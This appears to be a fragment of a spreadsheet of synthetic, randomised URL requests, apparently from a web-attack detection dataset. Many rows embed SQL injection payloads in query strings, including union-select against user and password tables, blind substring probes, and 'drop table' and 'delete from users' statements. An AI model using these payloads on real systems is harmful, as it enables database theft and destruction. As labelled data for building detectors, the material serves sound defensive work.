    <t>/touc7ajq9l_mcdgra4.shtml?s5mtt4cs5r=tbkopye9c&amp;seoeqnntr=4949556&amp;@s-jk17r@rftp=adpfjzcnn8&amp;eunai0du4nu1gt=183441&amp;shutdownam2document=ut]ro&amp;nuandn2l=909010&amp;foiodtatif5=if&amp;snl9sdtthost=hwct'+union+++/**/+++++select+2abi1tye+++++from+++++dba_users+++++where++++wia+++++like+++'%&amp;efiohr8ztisl=i4@rdgnjm&amp;donmt3wi35ez9fd=fij1xuha3ci.&amp;re4newi0xrasj=d&amp;e6s=y1m3tcme</t>
  </si>
  <si>
    <t>/typditddir/vyphro6w4sg-/swu5b625t8hzwebmc/ffee5s/i2c/ltt/s2tp5rjhvch-vrz2e.css?jquy8=qwer'+or++++ec2nh_v.account='htaag@air.com&amp;xdmrecn9a5eoa=o+</t>
  </si>
  <si>
    <t>/5lgyjcf1gt@a6.cgi?toptuyy=9&amp;dtho9tt7i=asd&amp;emiipnmqeheo=504936237&amp;y7wjmcl24b_=acsh+na&amp;4admincd2pusj6like=086144437&amp;czgachjliby_=paqejj&amp;l8lt=n3b1++wsra&amp;ihid=azwei7|snabetzt&amp;tibrwic=uotcoo&amp;jmht_b0g0gyp=')/**/unionall/**/select/**/25079/**/from/**/heh9s0/**/where/**/(++++''+++=++'/**/&amp;mkxfq5vgib_=e&amp;tnndbiexni4n=itshi</t>
  </si>
  <si>
    <t>/evnqlxbwek.aspx?ihy3eonr=34694&amp;in3ynull=0975&amp;uydi8=e/hoeavaerhmluhome9kgp&amp;maasea=v@++tchwindow.openteucnc&amp;6pusrupdatez=abh+t&amp;ai=or++++'ft'+++in+(+'+')&amp;noemnedt46iiwce=tofdaksaeoif4a</t>
  </si>
  <si>
    <t>/x@/cugwpvjj/eg50binqhnosdhgtplwh/o2nydyf.9mjblpv2_om/rhxux4ouyrwwb/wrtesga9edt/ur/ntwowab.js?a@b7gzgcvhi=6113107&amp;gwetmp=t&gt;6as9ioeoa&amp;sqxwiw_tz=txjfbp7jsf&amp;tirar9=7769540&amp;0lpbd27=pipcst&amp;t0tefnuucee=\\jtsltwh%ht&amp;xtimtd=441724612&amp;rmrufuz=5172&amp;uu2ns=srdgd&amp;er=ifid.rwyg&amp;almtc6gfy9ts='union+select+password+from+++dba_password;--</t>
  </si>
  <si>
    <t>/@45zdbc/sbah4.a.51.m_/nk1gcumqx/is.gif?pcrn1he1oi=bdats&amp;iheigsktiiyak=t@vmwlw&amp;fhlaiedpwaip=;%3&amp;ohnc=les&amp;gzohivbscripti=or++++'iaeg'+++=++n'++'&amp;8yrrle=884468&amp;asdzjcaeri=varaaeih5len+t@'t&amp;an=9&amp;elii=93&amp;nvaca=e402&amp;slwasnaorlo6=nkv7l1t&amp;rimccdocumentrand5=i&amp;nghwn72er=lhawhzq/5ttnc&amp;a0hos=ndqauluecohw</t>
  </si>
  <si>
    <t>/z6sldgdec9/twt6bmvtodqazx207xia/rtjoi/qg9@l.qc9vf2y/6bchildmetaw5/ji/e1imwaajn0bp/fv88ht1tq.js?7iclospuohas=[cdma|dlogts&amp;tdcekrstgv=okw7&amp;lylkbiltnaal2e=799526199&amp;bs=99&amp;rnen40oenp=d7dtobfnitycfput&amp;5ppupb3o=ows@vwtzexz7&amp;gtqtg=ergy&amp;ehsihaeahatt=feef(&amp;girifeplanpoxr=burltdl7v&amp;nr0tbadioawas68=fce&amp;poy1vataadeeogm='++or+++''++=+++'</t>
  </si>
  <si>
    <t>/ybc0n697c/ide.php4?31f=13627971&amp;kexecv6nmpfnz=riptept2&amp;enirn=ek8ppqtp9.3&amp;gyennblteng=97528&amp;u1bknnp=a4e8access_log'yesystemme+&amp;nhcyshlsa0xeod=and+++++ascii(lower(substring((select+++top++++1++tls7sb+++++from+++sysobject++++where++++xtype+++=++'u'),1,1)))++++&gt;++++111</t>
  </si>
  <si>
    <t>/vqimf6jtytss/e1tf/3eimssdd8nlteeeiw9/osqpm.html?qiov5c4hq=ijld-hwm@tp&amp;exec.vl@vt848q5=select+++9tet++++from++++all_users</t>
  </si>
  <si>
    <t>/o3c3h/no6ezdus/nx3r/c6.js?eaigh9tsbnee=and++ascii(lower(substring((select+++++top+++1+ten++++from+sysobject+++++where++xtype+++++=++'u'),1,1)))++++&gt;+111&amp;9tistyle_c=6&amp;1whomcahurq8heu=hmmepaccepte;da@&amp;lhn7rtevlv=d|ontelne&amp;wkpcdwurtmdle=nsfayv2&amp;ormrwpcliuisnen='8&amp;shutdownyrt=psi6aotnodeyilrmhidro&amp;erhyovbesasi=y&amp;&amp;axx6mhqn0d=797076&amp;obalthe=dtb0ssose</t>
  </si>
  <si>
    <t>/rpx8imyrrerfutno5aib/aru/bdimtmpqliframemq_lus/fbkh@a/f5tecz.php4?rmherxastorn7no=im3tsnj0&amp;ltksrmtia1=uc0i03)9r&amp;tidaa=ehseariunden&amp;sleubnh.dv=tpohvtmcaa&amp;enocheao2=diaeth44betweenb&amp;ngtoo=928897&amp;pf0rh9zw=tiydn&amp;nrdcf=tiyoyu&amp;idrescrxldan='+and++user_name()='sns&amp;jdvjnokfrgrer=5945&amp;ymr=arpemtzm</t>
  </si>
  <si>
    <t>/ooift2ikwshueyte/itjao/imgii/ct3n@0ysgasv/zcodunmao/tlixxq-uam.exe?bdyaeervnoiouo=qfideg+&amp;50cpoyaant3=14897&amp;tsjrhe6=el&amp;czhhtpassx=lmvlipuslhlsam&lt;[hcceat&amp;le7=8499&amp;hu7lbcnude=2152112&amp;rsplarive=rsid&amp;rlamm3=ctsgqrrglaxe&amp;oye4pacsaio=pwaliba&amp;hekir47elyotmh=';+drop++++table++++eheufeteeilx&amp;d8=selectq&amp;ihepb22dunphe=wkojfft&amp;disihilrtrt9n=akk&amp;lih4ej9cltl=-tryen6aegast</t>
  </si>
  <si>
    <t>/ana6hgegsnpsgct8m/xmlrwvvp71/gxodt2dls/4pxqfqoiw-bcadph6vb.gif?ntvm=a0dnn\\selects?tn3cat-es&amp;fooqg8j=g9n&amp;1wcxshco=ekykm&amp;ynpex='unionallselectfieldfromtrtawhere''+=+'&amp;wtlie4n0xrhhits=551767&amp;yngfhedipoprssm=653491155&amp;srne2nnijrt=+she&amp;e6r=76976274&amp;oxsg5t8dd=1511&amp;gstdinwdlocation.q02lh=50848&amp;tmaaanevoeii=4650615416&amp;sohpgs=71376947&amp;c54t9elwtepsn=hkmo+denull+set+himltmo&amp;roe=41036</t>
  </si>
  <si>
    <t>/7uerdvwz/e_2rzwxi40/i2nr2uneknouaablo/v66mw.7/lqq/3tko/dp/fvo/ak0vi2wy3.gmxcinzf.css?egtyslh=760357&amp;eersneaabosr=79020227&amp;taiavestrpty=434&amp;x3nk2='+++or++++'egienatsaer'+++&gt;+++'s&amp;2k-nph-ph=usdaaoie&amp;xbhmr5m=gigsnph-vly</t>
  </si>
  <si>
    <t>/telnetrid/twx/pformngqf9u8i/tllilvwtpknxreg44/chpz_q1/jhcato_lbqp..tiff?5s5terh=imgsoa=flynull&amp;elforesswhvrar=duk8dd&amp;tr=ppn&amp;smeltxdetkwa=971335938&amp;7hfel=5&amp;select98ortjuhymeta=297151417&amp;ln=w5agroup+bynn9divnform&amp;dstngsp=gr4u&amp;oee2csrbtlglml=it5i&amp;ovxsctnnela=';++++drop+++table++++admin&amp;visae8=98&amp;lpsmzxaf=ttmr0ashutdownyeos&lt;+;</t>
  </si>
  <si>
    <t>/@q3vzachwvxekcnc/cbnullzallm@/la/ssz9w9rt3style/8ttai0ajif/akvupjmdu8zfft/ecyp9wdtuyam/cpqehiat94eqmvmzh/hgnf8execz4b8s_v.png?xml0ah5j=kct8s5nt8to&amp;ekstas=ufwpy&amp;rnspaciiteeinve=21986&amp;il1ltottvtneeo=hwzikghgxm&amp;dausvse1al6d=hdtho&amp;inserttvscriptlib=enhevowieh5&amp;cmdp@fprocessing-instructiong6ko=uetp'++);deletefromuserswhereupper(username)++=upper(++++'admin&amp;haevhrslsr=passthruo/o0&amp;6yesbnp74y=20673245&amp;7inno-=004008245&amp;mios3eyheagthu=iidhviaeti</t>
  </si>
  <si>
    <t>/kygfqizawkzt4.sh?whavingikj=rnb&amp;mmair0sa=uo8nhaoi&amp;dairzseer=oeie4etw&amp;@swu=or+++++0&lt;&gt;(select+count(*)+from++++i4)</t>
  </si>
  <si>
    <t>/ow/4c1sk1cql_/aab4bu8@5mgduya/vxf5aantta/ags5kjfjhxxkf8qhaq.php4?0niyrmfasxoa=t\\dynhqn&amp;ftmlsoosctd='+/**/+++++or+/**/++++'htt4ny'+++++&gt;+++'s</t>
  </si>
  <si>
    <t>/childbj0gwuym8vm6/yneiafinbntndzplcnh/o2@tyvu.eqqb3acgtvv.swf?etf=0ss'+apo&amp;amea2dnoysnyo1e=965&amp;fselsbektl3='+)+union+++++all++++select++++443,116,51,4288,5379++from++fis+++++where+++(++''++=++++'&amp;homerqaccess_logegcat6mcrl=tpabres</t>
  </si>
  <si>
    <t>/z6kb8dgyhjdjy/7r0hxxi4cpv1smv-85g/dkjzt@an/c1l_f/noenorhpmetdeuig.htm?geiaowbjdbe='+++++or++'nturb'++between+++++'r'++and+++++'t</t>
  </si>
  <si>
    <t>/zdkoahvennlli7oass/wsh/i.xspoqdjn2zly4/rioshlhiptnfqrec5ta/m9ouug9s@cprlbyvhb.html?segxmtwohk1=349&amp;leoetdeeeqs=naq1i3hae@io&amp;yint=i4g-kd&amp;rswoo6o2anw=aisqpxlnomkoy8rn&amp;4wonsetessrersu=')+++un/**/ion+all++sel/**/ect+'ele3xtr',317,11,'j4tirng2',9+from+oaxhr+where+(++''+=++++'&amp;smiccrtuq=62&amp;htaccesepny3=en:5mlocationt=+&amp;t3i4uehdt=e(nchildo&amp;eens62eee=xtohytnimga7f&amp;vvetmpd=rexhk&amp;rngrnrist=ncmdel+e2tmpeo+est&amp;rlmqdqscu=8nd</t>
  </si>
  <si>
    <t>/fxajt5w4c1z6/dtban/owntstsuacridazes/a.ycmdwvvqg/ma1bndw/9vwravu/teamces9heerd/dj2xpv@zvh.jpeg?rrtsqee=co6mm9zsidgd&amp;otr5jlirneo=m&amp;ipomleesw=@lncql?et1otlu;gn&amp;nat=chairs'+union+++++select+od+++from+dba_users+++where+name+++like++'%&amp;pelscseigakoda=76367&amp;gf=phhswqtb</t>
  </si>
  <si>
    <t>/czbggqsua5htwj.jpeg?hnectgmytyt5s=5z9mxhki&amp;ncvx5gab='+++group++by+++++users.id++++having++++2=2&amp;2etoayik=it4yc&lt;i7e8&amp;ereirid=nojerpnm)wp+bee&amp;pgjtmp=71445718&amp;lsrssxniteatn=41&amp;xtp5bhpeti=63&amp;welnnhoiaeia=5823</t>
  </si>
  <si>
    <t>/metarj6nny@/couig/gta6rfnrke/zrq/adnhlnorgi/a1zozmson/f8edeesq/a8eslq4gmt/sieoyups0e/ettriewenfitiaae/c0dzbdivcillrzkz/kjqc6noc_m_.shtml?aoju='+++++or+++++'ye'+++++=++++n'++++&amp;esolnemqkeross=vqdx2biy&amp;na=ao?2from&amp;5seeqo=94&amp;ndbairu6es=wp&amp;funne=opvxbaob.rt&amp;talrnegtt4me=29948804&amp;eszair=gn&amp;lcthth9t=3st&amp;sewane=a9pld4f4m&amp;athnrllaj=rwn</t>
  </si>
  <si>
    <t>/fromghfd/unrend.jpg?asc2wpb8rateb=0594115&amp;iidz8es4xaat=or++++90&gt;16857032723&amp;sfteieia=ran&amp;hnjloyp5i5og=2166&amp;cvshznph-xmlas8=066005&amp;sihefp=u7rgksorzxv&amp;iyelsixtabamrls=ms7@cb&amp;fbn0zperl=slni+&amp;l0ifdnyia=39748428&amp;nlot=+sr;ie1tede&amp;0@88jtelnetfr0a=hew&amp;nd7llsffnlddnrd=u3aetoetnhsdlvu&amp;v1cfqb=nvp&amp;i4fotb=lgnbzloenkosbbk&amp;qyb_j5cstdina3positiont=swsyg</t>
  </si>
  <si>
    <t>/qanfvi-/ogubav-1qf@kr73ouxey/e3lo6th_-uv@tnfe/pnd94mi/8acpo1zkwbton/oc0/l5a8-xdd1uc/ettaaxs.gif?izoienx=rct6beqtaiie+&amp;uehaesei=eunt&gt;btrvol&amp;hdsciu6=rjoievercpo&amp;wk9lgiacphz=94210791&amp;ra=mniensesaetyxtmehr&amp;r7mailqe3and8d=ed0kzwf4&amp;lxtttwhvt=btveent4&amp;refvui7m=fga6wuh4t&amp;dscgisn=bgsoundk&amp;sq='++);+delete+++++from++users;+++++commit;++dummy(+++'</t>
  </si>
  <si>
    <t>/c2wfq.html?buhqh7timg=mpx5p6gxdoz&amp;rr=or+++6809540497=6809540497&amp;hnctl=sidmbc&amp;erfksoelr2=53691103&amp;groupbyio3derrmdb=14613&amp;pay6b5xperl=cb2gwj&amp;lyox=027</t>
  </si>
  <si>
    <t>/yreplacewfn-aqh@azu/tnqh1ifmz6hxf1z4-6z@/i4ox6xqm7rtkqkrpzx.tiff?dgthtbcrfvse='+++++union+++select+++++@@version,1,1,1--&amp;sa4eigt8mmiu4=nfnemris=bsq&amp;omdshdacsgei=tntppsnea&amp;_yfmkuka=nccn\\uarnno</t>
  </si>
  <si>
    <t>/def9nbswgh5aee/ou/rutjh/cl/tuek/5@g@vjlam/o90yyykkygjopyow4xl/bdnp7.dll?dkcfpa3e=rgqeme&amp;fphgy=libdl&amp;jg5id7juscriptc=7601&amp;i2qonu0reor=psssaerxhntu&amp;ymg6urn.y=juse:z&amp;&gt;o]i8ch|0an&amp;dt-bmqo=9089&amp;rtetatnavuwa=9&amp;s3ensrhemnlc=rms=2ahitlufco&amp;sqca3riiala=7&amp;5q3owjct0_h=me');deletefromuserswhereupper(username)++++=+++upper('admin&amp;9d=6042433&amp;edlnaomzzfrpa=849</t>
  </si>
  <si>
    <t>/ixtosrgjag/hhtdmpeh2s9li5ahst/eyi.buh/rtc7d0/zxhw1foql5u/winntnidyagtmpwn/az@h-m6i/epikgbmswbk8gwyi@/ilwqy0en1jtlgzanf..jsp?iugieehig=swdax&amp;tmnwvkzc7e=etraeuytux&amp;oe8o='++or+'4vf2uegioe'+++++like+'aze%</t>
  </si>
  <si>
    <t>/tnp48/puuehlmavte0aoh/smfhg/tarwh0hv9h/nhdtcasolaooi9o/st2eohe9iu6me7/6ixgn_zppvlqlj/ctsashofigrglh/mtesetuiktr/7m.php4?orx-ae=var7rbindonainsertece&amp;htr8ejphtaccesylocationn=980026&amp;9fatnph=r0eeya&amp;sefserrpmro3n='unionallselectfieldfromalesassewhere''=+'&amp;uiagf=2misioe&amp;cv.2perlkcz.replacef=610756&amp;ronuadviejs=ltmttg4ed&amp;asiiadszu9n2t5r=e&amp;aztntgolhmnde=97908&amp;4tthai=+~o%&amp;catceunetcat=ecopyne&amp;slo0e1kjiok=nomesnna4piof&amp;ntleinrfrshasn=kpieid&amp;arlo=71&amp;dthso2towealree=937181041</t>
  </si>
  <si>
    <t>/hoklkw_pm/tshu2islnhrra2leb4tv/zmp-/unesurnhn/3t5cvgol/z3n4chlc-@5rptn/ghduakngvaahgnn6eeat/nn/ns48th9efdd4odtsy4e/vrygmuobac5jcnl/iiaur1hiohrv/ay4.bin?fpmjyor=&amp;=ss/ocs&amp;ro=9grsh&amp;edrqesro6e0rc=hyhjsi@8d&amp;rie9fointluo=emna4eedud&amp;zykg2oxgfchild0=905279&amp;tamnnwnni7y=aeprse15vlwx&amp;c8uvcynstdin2d=++++or+++++2++&gt;++++1&amp;mae2swaog=devalsreimrn3gea$</t>
  </si>
  <si>
    <t>/l252k70tul.i/uuxnboot.ini/nvtmrwinntijtma_/ttvdcptoadlntiisyclt/hcoe@n8hnb6c6zdzzmm0/nhghtonac68tuom/rjn.swf?wp-irboot.inixpassthru573wc2=816&amp;wttl=grirosititlnazs1&amp;s8=eya+cstyleee&amp;h04='+++++union+++select++@@version,1,1,1--</t>
  </si>
  <si>
    <t>/yqbeoyyhjasea7re6oh/txuuhr8/as8cohtalstor2lieh/irlenot5rnwilsehtr/kpoet27qpil/nethtttha/e8bculmayphi/.tag-v.jpg?tsisrp2eas6ted6=eecnils&amp;3z50winl4=ncdi4o6frah2oa&amp;sivm=674231&amp;e3neuxr=407&amp;tirohe='++++or++id++++in+++++(+++++select++++*++++from++user_db+++)&amp;ebe=5723&amp;v7=5&amp;_jyq0f=ne+s</t>
  </si>
  <si>
    <t>/ucst/mss0cm/6azhmfmp/jrobmg45dg07as.ni/xvxsny5_hwlz/ssniuwcd/psamhfljcn_o/oesdbnqeanli.msf?ho6hcytmptvclnj=qwer'++or++++yqzgau_v.account='ebwutne@3f5pog.com&amp;huaobeateoa=c9aaoaan+ldi0at&amp;njotha85toe=10650&amp;smsen9p=3176470&amp;dsftaei=17&amp;wntsoer4roep=36&amp;nik4cte=lnznpedhuuo&amp;tsjttrrrnzm=+&amp;7ef&amp;m7at=maeqargqi</t>
  </si>
  <si>
    <t>/x7steehiodaidn/f3xo3_ox-dzyyfasrh/wpj/rqbfp/kgso2o1jstoriowvgs/rzrfeiurthot/n_c8hc/eionntqt1heoyetaefet/ax8j8xgqchvk0juu/aqjki/bzrkmz6dq612ur/oqqkchi5u89pilgen.aspx?easatos7=145&amp;gaia=-&amp;ame9dthera=oindb6e&amp;mkv8onzgrxid='unionallselectfieldfromtindstllneolwhere''=++++'&amp;se=841&amp;2tfdammj0bole=48143&amp;az6=ytr9girau7</t>
  </si>
  <si>
    <t>/9r9/nteedelao7vram/920ttwzhap.gcaztd/qri.swf?ncibasq=xom1qiny&amp;qk5p5='select+++customer_phone++++'||'from+customers+'||'where++customer_surname='''||+++++lv_surname||'''+++and+++customer_type=1';&amp;_g9vfhp=55710512&amp;qrnituc7e7cti=nckuy7bvjj&amp;i7el3vnrlgtees=761&amp;tsoennittttu=stho6oe&amp;ubunn=aoree(snteeo&lt;&gt;\\emochal%uj&amp;fadeg=mselectpasswd&amp;cotlvql=nycd5zze@ha&amp;doeaeed=tyhxh&amp;lsscocca=69325&amp;hbor8ebom=ertevhtaccesc&amp;mduw-c=14327</t>
  </si>
  <si>
    <t>/bm_m3g/4./nfd_wc/leh/eble_g.q/wd/f6nclivbhfosr.mspx?hxaqsm=d(m5htpass&gt;x&amp;ococrnemdt=s0a&amp;taoas=avtnodeb|ei&amp;ry1imb4eesot=atooisdeatez++c&amp;7itkae2tekt=17043835&amp;ehe7=527166&amp;kb5hetmeeehe=87072475&amp;lutthsnswtee=oi&amp;lf9ah2hjdqn=35&amp;baa20nhn=?&amp;i;&amp;s9ie0i=91795&amp;powuveti=h</t>
  </si>
  <si>
    <t>/er/5wmuzisr7/unionvmd/ikcqi-wb9mm0ts3b/edj.exe?du6unokytegass=slarmor&amp;ro=efbtj&amp;egd13=re84&amp;hoaweh=gknac&amp;cbnoatmenta6=eqne&amp;seeeytwn3ne1nlj=e_lx&amp;giahaeentfje=0444&amp;tsoqa6meetvs=tqpuy'fi+i&amp;xs4mhtsqdb=6&amp;orobubno=8040&amp;macahlhia=1813200&amp;f7=77952&amp;7rnhuftqo2=tngroup+by'&amp;lehaysieatsyt=7827&amp;5leaeaa=os(]'s0evalostmpechoobo</t>
  </si>
  <si>
    <t>/ouvwfxdp1w/5k/agxdrgk.olev7/ithhkyonnzqxerydeha/rl/rxu8kwinntperljetg_susrq/o2ais/ezl7/resesitbii/4kdd8cpxv/ashnfneayulsnrj.jsp?c9c_10shutdownkf=al2sc1telowo8</t>
  </si>
  <si>
    <t>/5unionpsfzconnect4wgakpn5/ne.wytyrdsig2mwmrv/ejiorulh8vg7yn/mhvzlssq9gandpby/2wdql/epg4gp59x/novgee_6gbd7bhtc_/tto99aogqin/npolwei2airnsslrc.jpg?hp3kkqz=497</t>
  </si>
  <si>
    <t>/lwemntvgrechohr7/gfccwsyehtbaoxm0nhau/fk2d_bodyrg6jc1k/sh-s0ebh4nb/iwtspisredaotoln/wyevalfl1xkzcswrw/rng/bqhmjsu91cu5kuv5.gif?oo7wwrncjpx=696&amp;cslt=3598701&amp;heh7otrcd3j=ryl66n4.fc8q&amp;uwsqqkslb=t&amp;ua_rez='ti+m+$o+)tw+�s&amp;loiiegtxrsrmrep=tchilds&gt;+k&amp;iwee=5dzd6iigioacs&amp;anniseus=&gt;fefqf2nph-yeho+wh~6(&amp;y6lstv=bsasaies7olitpdsti&amp;uiju=m+ri&amp;eaal=81557242&amp;eup0td=zydput._bn&amp;leausiuch=pssa+rhulllusr8araudbvar&amp;3adtfmaebfnei=sp6</t>
  </si>
  <si>
    <t>/bi1zoh/izetao7krp5iefxr4se/pystyle7chpqc/cettetl/ctpmra6ddrqgdc/dugrq.1sxrcn/8y2sguvvcpd/po.cgi?orhefovusklpho=2lt4</t>
  </si>
  <si>
    <t>/echoibvor.png?rophokvaoen1ita=i'n[eastmpni&amp;okghs=+n0+s(iteapasr(&amp;egco7nthbrokti=zdypse%&amp;elyt4=sweoul&amp;retndhrrfaa=vm&amp;uhynullor=athesirttjwhtmcl&amp;se9z=560817&amp;ssy0=49&amp;lptaeotrodgdtoh=dse+a7eddr7ee&amp;etennaparbn=683</t>
  </si>
  <si>
    <t>/nho/1santlfhsoz0/mhud7fy1mw@u8k6wyztx/onenra8ed/ciersls/taruh6awsosysi/cfyk2gtnc.gif?ltlned7ptve=napsjn9+&amp;qtb=39045&amp;xs=5&gt;xp_dilink6serm&amp;taou0e9=oo+rbh=bhaoeroa5cr]&amp;bizahcoteieo=0490894&amp;elnnudem=so@fik$]tbsoo$r&amp;nkmdhqlafw8n=4ff8dusra|lraod%7netcat&amp;3do=u+gsbstyle&amp;lee1=utwi5l&amp;mtn2v=form5+ge\\group+bya0geoqe]0&amp;3adxlo3edemit=itpseacaeeiig1sr</t>
  </si>
  <si>
    <t>/cmxxtvxzc7_/nypybcb83/st3h/9o4tges.dll?pl=new4he&amp;deeasirdm=glromhathdqmm</t>
  </si>
  <si>
    <t>/apxalubvff7prq3tbb/sg2wb/au2/deaktodqtnttiptqy/stu/9x7l3u/0ssmhprg8eol5eogoa/iyt0enchsiilenreopsy/ebibmw-r6a.dll?trumc=b3dar&amp;al1=phgar-p</t>
  </si>
  <si>
    <t>/cot-rrln2jbpwuz/tlbvehjc9cgrv8x_3wul/pfmoeqeaaelbtezsd9/jiqltraiehcdulc/t7y.iscy/snnoruymi4ozpecarl.gif?ul=t3f08s&amp;ta2e=nonq&amp;lohtk4t=o?&amp;ersux3un=51&amp;hhphyg1htdeu=ezjtiq&amp;amnraani2s4s=tfat0am9ee</t>
  </si>
  <si>
    <t>/lknytsicim/zl8vd/cludoosolfienwtsi/e2qvjhksbuvw/afmh5nesfslmohsod6.asmx?wwas=3085&amp;olxwce8weif=67310119&amp;udr=bdeb5u&amp;lofyykptty=iie=0yb-s~e@copydo&amp;qrzesvd=atn%l@rbody</t>
  </si>
  <si>
    <t>/2xyf.wby3ei8_g2_/rkiwd7gfuele9g1/e6nrymby0ahcpu/263x41aewzse/axrt/bo/ofn7nitsnil0rl/n.a92obeetc/rbgn-biyw-d.exe?lu8k3=t@&amp;hgawctaspmn=00gla&gt;es&amp;tjiceinaznnging=0&gt;i]nyers4e+ra&amp;en1sm9=acobnmawhkee</t>
  </si>
  <si>
    <t>/xlvnexprocessing-instructionqvh/e6dhukuz/s3bsl-p/sf60cgrefwaf/esg/p5vauzqn_fnullo/ipd2wmyxkgq.7idy8eel/ufjti-to612arf.sh?binwhereereag=aphit&amp;nrgaweteesi=sqnanxtnls0ngpa&amp;dioefueb=85&amp;c1jcopy3l=9dbzipz27&amp;.2slinkowduiq=bd-teab+ba9&amp;3oti45=:enspositiont0as[qhomedbwget&amp;zeezrh=ea=hmetmbetweenwgetuor-&amp;oqrgndgfj4=amar-&amp;4ek=95415221</t>
  </si>
  <si>
    <t>/7ldh3p/629oenrdanehmmc/tx82osvhx/pma0t/l7jrteao.php3?fbd-r5lxp0n=t&amp;klbhoseh2etpe=ks1efrlo8&amp;emt4fzmrtm=a5servicesy</t>
  </si>
  <si>
    <t>/sock_streamv5qf5uwog7w8/91iegi/mruvragtth0a/bbp-jr7a.htm?apreeesmecushd=et&amp;gbcvchildxoe4i=tes&lt;dnteezadt&amp;ne=6607573&amp;egse8neaqeepsu=washsta+</t>
  </si>
  <si>
    <t>/a1xn/catrsefiivar/tyrhenonhbmepeurmhhm/eaiatetwet0edr/et24c/ns9odlzrnslnetio/harruonr9/ssliqvtkpldhw.jpeg?ufval-rk=cqmt4qmyf&amp;paioe9=elit6pacx&amp;esen=et&amp;ucfeo=eex+w&gt;+e&amp;@samjinsert6yjkwinnt=o~svi&amp;ve3bylr0dnl=2562190&amp;elen4l8yrsodroh=uaa&amp;ee680ar=tlm+inh~&amp;leeiblwnfteme=76kutxzj&amp;etqelikees=9&amp;thnegw1=81gnt&amp;eodjenre=j6s&amp;th7zeilvvuse=iwp-h&amp;3q=s10eepftyertset</t>
  </si>
  <si>
    <t>/amhumok2fpzey_m/tde.htm?jtuwindow.open1du=6274&amp;ogdn8en8eizr=2751383318&amp;nv8ufl=4222&amp;9lwcsfcvhoq=tboot.inireb&amp;qnarm5uyh=cbpzjxnvfcx&amp;xisipyf=4070489325&amp;cxtermel@=8230224&amp;iyenemgal=raed9</t>
  </si>
  <si>
    <t>/shlfol72/btenscau1ooudhaatett.shtml?oshoax=4221131&amp;eyn5emot=4&amp;tahktef=4908069&amp;aesanfes=e&amp;_tc6s=26&amp;05zv5ou=updatewysusraev|/larae&amp;6dimokaeb8ci=em0ymsiodipsmstx7e&amp;gp.f5zwp-v=a3o3hxformrcpobodyslsgxtermo</t>
  </si>
  <si>
    <t>/e1/olmzsz98chrkhuo/ye40/egostaieltirnlnsbriq.php4?heswgwe=4&amp;tsawtr=nlq2&amp;ea5a794=gidauno</t>
  </si>
  <si>
    <t>/md6lefugyxdzn3amhzo/sock_streaml8xtermw8/vcopyselect672.asp?osz=stmstgut8uhranv&amp;titu=rji&amp;inuniecneu3lo=tzswe1&amp;lhcvtttoad=o&amp;nrrsct=5384563&amp;erstpypummoevc=6424&amp;ts8b2=26&amp;so=etckmn&amp;al=96221&amp;ozyh6=rtepaesqf4ss&amp;havinghhavingwherewdbu=wfe2nmnubjt&amp;6h=qttoennhelst&amp;kymwj1aw2=tpeth&amp;tt=a6</t>
  </si>
  <si>
    <t>/_wpacceptjk8access_logla.ox/asvzgd_1jbdxs@wf1z/fnc2rma6tmfceastovan/odnrenf7roocjeisu.mdb?nmn=7ibmneetoneail&amp;l1moo=ddxtb&amp;e56u=65874&amp;te=da&amp;jz&amp;oepunan=la7oinclude/rb0td&amp;geos=lebetweene</t>
  </si>
  <si>
    <t>/ysyz6xndco/asonser1ngepa/accept0eosf/axrg0apnevalh@al3cx.html?tasmlaes=021809&amp;thbsbiihsl=gsmail2nodesc)qspuinoltwuss&amp;os4ymzasuoi=jr5gq79du&amp;iatymedtuhm1aid=oesmiwr&amp;wtxfsy7-=eerekesaorxoe&amp;uhgeiofesxdhse=wo8imko&amp;rlcte1wdeoo71=ee&amp;eroaewt=406&amp;tgzqn5gw5=8982&amp;raeeoxkdsehi=6721787</t>
  </si>
  <si>
    <t>/zilshrwrtno/cehjdneeezientwiut/yvkn4yuvpasswd9/_4logevalxswmboot.ini/oi0qgqjf3h7dystcwu/e@4xi.2sh/5exoi6uzvdx/meetyomtjvels.html?yriogensnu==plosrtn&amp;rsjrgognurn=346&amp;tryo88mne=inefnrot-nc(&amp;1pce=e&gt;znoh</t>
  </si>
  <si>
    <t>/dsy5ycn/i4vtwwtmxrskl46/on.shtml?eeaootoepad=eval&amp;ftp0bq=ehzkmsc&amp;smgiee2rebxpast=ecpkeq&amp;fos3cssfaeunsw=nkdr9sb&lt;uf&amp;enex2pia=978546&amp;xpkstdinc4kr=98&amp;tnr9fe=ffednaonie8reorhe</t>
  </si>
  <si>
    <t>/siolhihnvltmrtdeoaro/ec.jpeg?m8ceih=xme+iwnnehea&amp;58hehdx6d=47708798&amp;sbe=div~uoro&amp;etxft=5&amp;ae5.lt-@xbes=390782&amp;oouttnenolmnet=4ms&amp;uucwesr=ato&amp;pt6rs8r=epassthrucdi&amp;or=u'bhomelto&amp;nph-lxahftp@fftppc=036463&amp;apiysgtht=049674</t>
  </si>
  <si>
    <t>/nlr9mht/6r2ipwbhx1zcj-n08k4z/nptkf/jcghuh4uhem-/jlyn2rq._k_/5aeecaim/xcgwbf8-c_l8xoa/qzaccess_logzy2zlikevk/waothlnicoqtevr/cfz.gif?8rd7=d19chgk-kpby&amp;oe8dkalnde=e:2&amp;aoiisgy9o4od=adminn91where1p9sii7f&amp;gt=d+n)ht&amp;u0ovuec1e=549203&amp;nuxg=7oeaemhqa2+ao&amp;o07xal=l@rznge&amp;e6ht=30134&amp;ctenoyki=esock_stream4oew&amp;tvgtuaa=[3wt&amp;tslhoa5i3mdec=e1aeqe</t>
  </si>
  <si>
    <t>/skz2oir9kg/sptoexa/ttn56tdyptt/spewsrtdea/xt1lqeesfimsho1ii/wjiobodywinnt3/2ua86adopngddetm/uiipdtrsbs/kzta/br4uldlchb/cc0a5rbe8zdv_.php3?flr47cs=&gt;ftpts;9ae&amp;ios@=2267575&amp;uscesdgm7s=+psjaq&amp;reqetsr2tson=y3hw&amp;4fzean=molsvclmtrfdeik&amp;5lewsoui9flnn=hdfhhhmgkvatqoiisr&amp;tx6bl=0781</t>
  </si>
  <si>
    <t>XPath</t>
  </si>
  <si>
    <t>/d6dsei5lw/tir7ijm/sakk9krvmm0kogps/nvxsjnf/ht2heisui3ehoqsesi/igcrovbb8cwnciudelr/utbepb4/ls/wnir3ote9aaaumasadp/sswedcoet9ueiateyss/aihp89km.h_/dj.tiff</t>
  </si>
  <si>
